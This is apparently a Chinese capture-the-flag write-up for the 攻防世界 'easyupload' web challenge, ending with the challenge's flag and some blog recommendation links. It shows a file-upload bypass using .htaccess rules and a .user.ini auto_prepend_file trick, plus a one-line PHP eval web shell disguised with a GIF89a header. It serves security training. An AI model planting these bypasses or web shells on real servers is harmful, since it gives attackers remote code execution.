攻防世界-Web-easyupload

知识点

1.user.int绕过限制

步骤

1.直接抓包,先测是上传限制。(上传png等文件时记得加上GIF89a文件头)

php文件被禁止上传,尝试上传.htaccess文件,用来解析png文件中的php代码,结果发现.htaccess中的内容被限制了。如下内容:

复制代码
方法一:
<FilesMatch "4.png">
SetHandler application/x-httpd-php
</FilesMatch>
 
方法二:
AddType application/x-httpd-php .png

在此处需要使用.user.ini,这个文件的作用和.htaccess差不多,都是使一个文件能够被执行。

.user.ini文件内容:(使1.png能够被当做php执行)

复制代码
GIF89a
auto_prepend_file=1.png

然后再上传png文件,里面写上一句话木马,这里上传png文件时,不能包含php字样,所以采用另外一种一句话木马

1.png文件内容:(注意这里不要有空格不然会连接不上)

复制代码
GIF89a
<?=eval($_POST['cmd']);?>

2.连接

flag:cyberpeace{1b4d400f5bdf7e215a443886721a1fab}

相关推荐
Bruce_Liuxiaowei5 小时前
MQTT协议在物联网环境中的安全风险与防范指南
运维·网络·物联网·安全·网络安全
witkey_ak98961 天前
网安面试题收集(1)
网络安全
绿油果1 天前
Javaweb(BeanUtils)
java·web
网安INF2 天前
【论文阅读】-《SparseFool: a few pixels make a big difference》
论文阅读·人工智能·深度学习·网络安全·黑盒攻击
介一安全2 天前
【Web安全】转义字符注入?转义也会失效的SQL注入
web安全·网络安全·安全性测试·sql注入
网安INF2 天前
【论文阅读】-《Sparse Adversarial Attack via Perturbation Factorization》
论文阅读·人工智能·计算机视觉·网络安全·黑盒攻击
lingggggaaaa2 天前
小迪安全v2023学习笔记(九十七天)—— 云原生篇&Kubernetes&K8s安全&API&Kubelet未授权访问&容器执行
java·笔记·学习·安全·网络安全·云原生·kubernetes
余防2 天前
代码审计
安全·web安全·网络安全
Whoami!2 天前
4-8〔O҉S҉C҉P҉ ◈ 研记〕❘ WEB应用攻击▸命令注入漏洞
网络安全·信息安全·oscp·命令注入攻击